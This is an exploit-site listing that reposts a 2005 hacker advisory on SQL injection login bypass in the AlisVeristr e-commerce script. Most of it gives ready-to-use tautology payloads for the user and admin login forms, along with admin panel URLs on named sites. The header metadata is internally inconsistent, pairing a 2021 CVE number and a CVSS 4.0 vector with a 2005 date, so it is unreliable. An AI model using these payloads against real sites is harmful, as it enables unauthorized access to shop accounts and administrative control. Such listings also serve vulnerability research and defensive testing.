Advertisement






AlisVeristr E-commerce Script Admin and User Login Sql Injection

CVE Category Price Severity
CVE-2021-3713 CWE-89 $5000 High
Author Risk Exploitation Type Date
Unknown High Remote 2005-12-13
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005120009

Below is a copy:

###Hi all
###B3g0k[at]hackermail.com
###Kurdish Hacker
###Special Thanx All Kurdish Hackers
###Freedom For Ocalan!!!
###-----------------------------------
###Alisveristr E-commerce User Login Sql Injection
###Alisveristr E-commerce Admin Login Sql ### Injection
###-----------------------------------
###Site: http://www.alisveristr.com or ###http://www.alisveris-tr.com
###
###Description: A E-Commerce scirpt it is too ###cool... :)
User login Sql Injection:

Code 1 For User Login :

Username : ' or ''='              
Password: ' or ''='

Another User Login Sql İnjecition

Username : ' or 'a'='a
Password : ' or 'a'='a

----------------------------------

Now Admin login Sql injectoin
ex: http://site.com/yonetim/default.asp
http://www.alisveristr.com/yonetim
http://www.alisveris-tr.com/yonetim

Code 1 For Admin Login 
Username : ' or ''='
Password : ' or ''='

Code 2 For Admin Login :
Username : ' or 'a'='a
Password : ' or 'a'='a

Thats it.
Contact : [email protected]
Kurdish Hacker

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.